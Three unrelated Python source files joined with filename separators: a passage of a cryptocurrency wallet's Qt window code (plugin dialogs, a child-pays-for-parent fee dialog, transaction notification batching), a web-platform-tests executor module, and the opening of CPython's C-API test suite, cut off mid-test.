widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
if not p:
# Need to delete settings widget because keeping it around causes bugs as it points to a now-dead plugin instance
settings_widgets.pop(name)
widget.hide(); widget.setParent(None); widget.deleteLater(); widget = None
def do_toggle(weakCb, name, i):
cb = weakCb()
if cb:
p = plugins.toggle_internal_plugin(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# All plugins get this whenever one is toggled.
run_hook('init_qt', gui_object)
for i, descr in enumerate(plugins.internal_plugin_metadata.values()):
name = descr['__name__']
p = plugins.get_internal_plugin(name)
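# Plugins that register a keystore (hardware wallet plugins) are handled elsewhere and are skipped here.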
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
weakCb = Weak.ref(cb)
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_internal_plugin_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, weakCb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stderr)
grid.setRowStretch(len(plugins.internal_plugin_metadata.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
self.internalpluginsdialog = d
d.exec_()
self.internalpluginsdialog = None # Python GC please!
def external_plugins_dialog(self):
if self.externalpluginsdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.externalpluginsdialog.raise_()
return
from . import external_plugins_window
d = external_plugins_window.ExternalPluginsDialog(self, _('Plugin Manager'))
self.externalpluginsdialog = d
d.exec_()
self.externalpluginsdialog = None # allow python to GC
def hardware_wallet_support(self):
if not sys.platform.startswith('linux'):
self.print_error("FIXME! hardware_wallet_support is Linux only!")
return
if self.hardwarewalletdialog:
# NB: reentrance here is possible due to the way the window menus work on MacOS.. so guard against it
self.hardwarewalletdialog.raise_()
return
from .udev_installer import InstallHardwareWalletSupportDialog
d = InstallHardwareWalletSupportDialog(self.top_level_window(), self.gui_object.plugins)
self.hardwarewalletdialog = d
d.exec_()
self.hardwarewalletdialog = None # allow python to GC
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self.top_level_window(), _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel(_('{total_size} bytes').format(total_size=total_size)), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - (fee_e.get_amount() or 0)  # get_amount() may return None while the field is empty
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
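# Initial fee suggestion: the configured fee/kB rate applied to the combined size of parent + child.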
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
result = d.exec_()
d.setParent(None) # So Python can GC
if not result:
return
fee = fee_e.get_amount()
if fee is None or fee > max_fee:  # guard against an empty fee field (get_amount() -> None)
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
if new_tx is None:
self.show_error(_('CPFP no longer valid'))
return
self.show_transaction(new_tx)
def rebuild_history(self):
if self.gui_object.warn_if_no_network(self):
# Don't allow this in offline mode.
return
msg = ' '.join([
_('This feature is intended to allow you to rebuild a wallet if it has become corrupted.'),
"\n\n"+_('Your entire transaction history will be downloaded again from the server and verified from the blockchain.'),
_('Just to be safe, back up your wallet file first!'),
"\n\n"+_("Rebuild this wallet's history now?")
])
if self.question(msg, title=_("Rebuild Wallet History")):
try:
self.wallet.rebuild_history()
except RuntimeError as e:
self.show_error(str(e))
def scan_beyond_gap(self):
if self.gui_object.warn_if_no_network(self):
return
from .scan_beyond_gap import ScanBeyondGap
d = ScanBeyondGap(self)
d.exec_()
d.setParent(None) # help along Python by dropping refct to 0
def copy_to_clipboard(self, text, tooltip=None, widget=None):
tooltip = tooltip or _("Text copied to clipboard")
widget = widget or self
qApp.clipboard().setText(text)
QToolTip.showText(QCursor.pos(), tooltip, widget)
class TxUpdateMgr(QObject, PrintError):
''' Manages new transaction notifications and transaction verified
notifications from the network thread. It collates them and sends them to
the appropriate GUI controls in the main_window in an efficient manner. '''
def __init__(self, main_window_parent):
assert isinstance(main_window_parent, ElectrumWindow), "TxUpdateMgr must be constructed with an ElectrumWindow as its parent"
super().__init__(main_window_parent)
self.cleaned_up = False
self.lock = threading.Lock() # used to lock thread-shared attrs below
# begin thread-shared attributes
self.notif_q = []
self.verif_q = []
self.need_process_v, self.need_process_n = False, False
# /end thread-shared attributes
self.weakParent = Weak.ref(main_window_parent)
main_window_parent.history_updated_signal.connect(self.verifs_get_and_clear, Qt.DirectConnection) # immediately clear verif_q on history update because it would be redundant to keep the verify queue around after a history list update
main_window_parent.on_timer_signal.connect(self.do_check, Qt.DirectConnection) # hook into main_window's timer_actions function
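# Polling timer used after a verification batch while the history tab still shows 'Unknown' balances; see schedule_full_hist_refresh_maybe below.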
self.full_hist_refresh_timer = QTimer(self)
self.full_hist_refresh_timer.setInterval(1000); self.full_hist_refresh_timer.setSingleShot(False)
self.full_hist_refresh_timer.timeout.connect(self.schedule_full_hist_refresh_maybe)
def diagnostic_name(self):
return ((self.weakParent() and self.weakParent().diagnostic_name()) or "???") + "." + __class__.__name__
def clean_up(self):
self.cleaned_up = True
main_window_parent = self.weakParent() # weak -> strong ref
if main_window_parent:
try: main_window_parent.history_updated_signal.disconnect(self.verifs_get_and_clear)
except TypeError: pass
try: main_window_parent.on_timer_signal.disconnect(self.do_check)
except TypeError: pass
def do_check(self):
''' Called from timer_actions in main_window to check if notifs or
verifs need to update the GUI.
- Checks the need_process_[v|n] flags
- If either flag is set, call the @rate_limited process_verifs
and/or process_notifs functions which update GUI parent in a
rate-limited (collated) fashion (for decent GUI responsiveness). '''
with self.lock:
bV, bN = self.need_process_v, self.need_process_n
self.need_process_v, self.need_process_n = False, False
if bV: self.process_verifs() # rate_limited call (1 per second)
if bN: self.process_notifs() # rate_limited call (1 per 15 seconds)
def verifs_get_and_clear(self):
''' Clears the verif_q. This is called from the network
thread for the 'verified2' event as well as from
process_verifs below (GUI thread), hence the lock. '''
with self.lock:
ret = self.verif_q
self.verif_q = []
self.need_process_v = False
return ret
def notifs_get_and_clear(self):
with self.lock:
ret = self.notif_q
self.notif_q = []
self.need_process_n = False
return ret
def verif_add(self, args):
# args: [wallet, tx_hash, height, conf, timestamp]
# filter out tx's not for this wallet
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
if args[0] is parent.wallet:
with self.lock:
self.verif_q.append(args[1:])
self.need_process_v = True
def notif_add(self, args):
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
tx, wallet = args
# filter out tx's not for this wallet
if wallet is parent.wallet:
with self.lock:
self.notif_q.append(tx)
self.need_process_n = True
@rate_limited(1.0, ts_after=True)
def process_verifs(self):
''' Update history list with tx's from verifs_q, but limit the
GUI update rate to once per second. '''
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
items = self.verifs_get_and_clear()
if items:
t0 = time.time()
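# Batch the GUI update: disable repaints and sorting while all items are applied, then restore them, which is much cheaper than updating row by row.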
parent.history_list.setUpdatesEnabled(False)
parent.slp_history_list.setUpdatesEnabled(False)
had_sorting = [ parent.history_list.isSortingEnabled(),
parent.slp_history_list.isSortingEnabled() ]
if had_sorting[0]:
parent.history_list.setSortingEnabled(False)
if had_sorting[1]:
parent.slp_history_list.setSortingEnabled(False)
n_updates = 0
for item in items:
did_update = parent.history_list.update_item(*item)
parent.slp_history_list.update_item_netupdate(*item)
n_updates += 1 if did_update else 0
self.print_error("Updated {}/{} verified txs in GUI in {:0.2f} ms"
.format(n_updates, len(items), (time.time()-t0)*1e3))
if had_sorting[0]:
parent.history_list.setSortingEnabled(True)
if had_sorting[1]:
parent.slp_history_list.setSortingEnabled(True)
parent.slp_history_list.setUpdatesEnabled(True)
parent.history_list.setUpdatesEnabled(True)
parent.update_status()
if parent.history_list.has_unknown_balances:
self.print_error("History tab: 'Unknown' balances detected, will schedule a GUI refresh after wallet settles")
self._full_refresh_ctr = 0
self.full_hist_refresh_timer.start()
_full_refresh_ctr = 0
def schedule_full_hist_refresh_maybe(self):
''' self.full_hist_refresh_timer timeout slot. May schedule a full
history refresh after wallet settles if we have "Unknown" balances. '''
parent = self.weakParent()
if self._full_refresh_ctr > 60:
# Too many retries. Give up.
self.print_error("History tab: Full refresh scheduler timed out.. wallet hasn't settled in 1 minute. Giving up.")
self.full_hist_refresh_timer.stop()
elif parent and parent.history_list.has_unknown_balances:
# Still have 'Unknown' balance. Check if wallet is settled.
if self.need_process_v or not parent.wallet.is_fully_settled_down():
# Wallet not fully settled down yet... schedule this function to run later
self.print_error("History tab: Wallet not yet settled.. will try again in 1 second...")
else:
# Wallet has settled. Schedule an update. Note this function may be called again
# in 1 second to check if the 'Unknown' situation has corrected itself.
self.print_error("History tab: Wallet has settled down, latching need_update to true")
parent.need_update.set()
self._full_refresh_ctr += 1
else:
# No more polling is required. 'Unknown' balance disappeared from
# GUI (or parent window was just closed).
self.full_hist_refresh_timer.stop()
self._full_refresh_ctr = 0
@rate_limited(5.0, classlevel=True)
def process_notifs(self):
parent = self.weakParent()
if not parent or parent.cleaned_up:
return
if parent.network:
n_ok = 0
txns = self.notifs_get_and_clear()
if txns and parent.wallet.storage.get('gui_notify_tx', True):
# Combine the transactions
total_amount = 0
tokens_included = set()
for tx in txns:
if tx:
is_relevant, is_mine, v, fee = parent.wallet.get_wallet_delta(tx)
if is_relevant:
total_amount += v
n_ok += 1
if parent.is_slp_wallet:
try:
tti = parent.wallet.get_slp_token_info(tx.txid())
tokens_included.add(parent.wallet.token_types.get(tti['token_id'],{}).get('name','unknown'))
except KeyError:
pass
if tokens_included:
tokstring = _('. Tokens included: ') + ', '.join(sorted(tokens_included))
else:
tokstring = ''
if total_amount > 0:
self.print_error("Notifying GUI %d tx"%(n_ok))
if n_ok > 1:
parent.notify(_("{} new transactions: {}{}")
.format(n_ok, parent.format_amount_and_units(total_amount, is_diff=True), tokstring))
else:
parent.notify(_("New transaction: {}{}").format(parent.format_amount_and_units(total_amount, is_diff=True), tokstring))
|
base.py
|
import hashlib
import httplib
import os
import threading
import traceback
import socket
import urlparse
from abc import ABCMeta, abstractmethod
from ..testrunner import Stop
here = os.path.split(__file__)[0]
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def executor_kwargs(test_type, server_config, cache_manager, **kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": server_config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type == "reftest":
executor_kwargs["screenshot_cache"] = cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlparse.urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlparse.urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN"}
def __call__(self, test, result):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message)
return (harness_result,
[test.subtest_result_cls(name, self.test_codes[status], message, stack)
for name, status, message, stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def reftest_result_converter(self, test, result):
return (test.result_cls(result["status"], result["message"],
extra=result.get("extra")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TestExecutor(object):
__metaclass__ = ABCMeta
test_type = None
convert_result = None
def __init__(self, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.external_config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
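# Environment (protocol/prefs) of the most recently run test; run_test() triggers on_environment_change only when a new test's environment differs from this.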
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
@property
def logger(self):
"""StructuredLogger for this executor"""
if self.runner is not None:
return self.runner.logger
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
try:
result = self.do_test(test)
except Exception as e:
result = self.result_from_exception(test, e)
if result is Stop:
return result
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol):
return "%s://%s:%s" % (protocol,
self.server_config["host"],
self.server_config["ports"][protocol][0])
def test_url(self, test):
return urlparse.urljoin(self.server_url(test.environment["protocol"]), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "ERROR"
message = unicode(getattr(e, "message", ""))
if message:
message += "\n"
message += traceback.format_exc(e)
return test.result_cls(status, message), []
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
def __init__(self, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi):
timeout = test.timeout * self.timeout_multiplier
key = (test.url, viewport_size, dpi)
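# Screenshots are cached per (url, viewport size, dpi) so each reference page is rendered at most once per configuration.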
if key not in self.screenshot_cache:
success, data = self.executor.screenshot(test, viewport_size, dpi)
if not success:
return False, data
screenshot = data
hash_value = hashlib.sha1(screenshot).hexdigest()
self.screenshot_cache[key] = (hash_value, None)
rv = (hash_value, screenshot)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def is_pass(self, lhs_hash, rhs_hash, relation):
assert relation in ("==", "!=")
self.message.append("Testing %s %s %s" % (lhs_hash, relation, rhs_hash))
return ((relation == "==" and lhs_hash == rhs_hash) or
(relation == "!=" and lhs_hash != rhs_hash))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
self.message = []
# Depth-first search of reference tree, with the goal
# of reaching a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
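# Each stack entry is ((lhs_node, rhs_node), relation), where relation is "==" or "!=".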
while stack:
hashes = [None, None]
screenshots = [None, None]
nodes, relation = stack.pop()
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
if self.is_pass(hashes[0], hashes[1], relation):
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1]) for item in reversed(nodes[1].references)))
else:
# We passed
return {"status":"PASS", "message": None}
# We failed, so construct a failure message
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi)
if success:
screenshots[i] = screenshot
log_data = [{"url": nodes[0].url, "screenshot": screenshots[0]}, relation,
{"url": nodes[1].url, "screenshot": screenshots[1]}]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def retake_screenshot(self, node, viewport_size, dpi):
success, data = self.executor.screenshot(node, viewport_size, dpi)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None
def __init__(self, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.protocol = self.protocol_cls(self, browser)
def is_alive(self):
return self.protocol.is_alive
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + extra_timeout
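# Run the pytest-based wdspec test in a watchdog thread (WdspecRun); if it does not finish within the timeout, the result is reported as EXTERNAL-TIMEOUT.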
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
harness_result = ("OK", None)
subtest_results = pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
return (harness_result, subtest_results)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class Protocol(object):
def __init__(self, executor, browser):
self.executor = executor
self.browser = browser
@property
def logger(self):
return self.executor.logger
def setup(self, runner):
pass
def teardown(self):
pass
def wait(self):
pass
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
flag = self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message", "")  # not all exceptions have a .message attribute
if message:
message += "\n"
message += traceback.format_exc(e)
self.result = False, ("ERROR", message)
finally:
self.result_flag.set()
class WebDriverProtocol(Protocol):
server_cls = None
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
def setup(self, runner):
"""Connect to browser via the HTTP server."""
try:
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args)
self.server.start(block=False)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
except Exception:
self.logger.error(traceback.format_exc())
self.executor.runner.send_message("init_failed")
else:
self.executor.runner.send_message("init_succeeded")
def teardown(self):
if self.server is not None and self.server.is_alive:
self.server.stop()
@property
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = httplib.HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by definition,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import _thread
import importlib.machinery
import importlib.util
import os
import pickle
import random
import re
import subprocess
import sys
import textwrap
import threading
import time
import unittest
import weakref
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support import import_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import _testmultiphase
except ImportError:
_testmultiphase = None
# Skip this test if the _testcapi module isn't available.
_testcapi = import_helper.import_module('_testcapi')
import _testinternalcapi
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def decode_stderr(err):
return err.decode('utf-8', 'replace').replace('\r', '')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
@support.requires_subprocess()
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error: '
b'PyThreadState_Get: '
b'the function must be called with the GIL held, '
b'but the GIL is released '
b'(the current Python thread state is NULL)'),
err)
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exception(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
orig_sys_exception = sys.exception()
orig_exception = _testcapi.set_exception(new_exc)
new_sys_exception = sys.exception()
new_exception = _testcapi.set_exception(orig_exception)
reset_sys_exception = sys.exception()
self.assertEqual(orig_exception, e)
self.assertEqual(orig_exception, raised_exception)
self.assertEqual(orig_sys_exception, orig_exception)
self.assertEqual(reset_sys_exception, orig_exception)
self.assertEqual(new_exception, new_exc)
self.assertEqual(new_sys_exception, new_exception)
else:
self.fail("Exception not raised")
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.fail("Exception not raised")
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_c_type_with_ipow(self):
# When the __ipow__ method of a type was implemented in C, using the
# modulo param would cause segfaults.
o = _testcapi.ipowType()
self.assertEqual(o.__ipow__(1), (1, None))
self.assertEqual(o.__ipow__(2, 2), (2, 2))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
err = decode_stderr(err)
self.assertRegex(err,
r'Fatal Python error: _Py_CheckFunctionResult: '
r'a function returned NULL without setting an exception\n'
r'Python runtime state: initialized\n'
r'SystemError: <built-in function return_null_without_error> '
r'returned NULL without setting an exception\n'
r'\n'
r'Current thread.*:\n'
r' File .*", line 6 in <module>\n')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
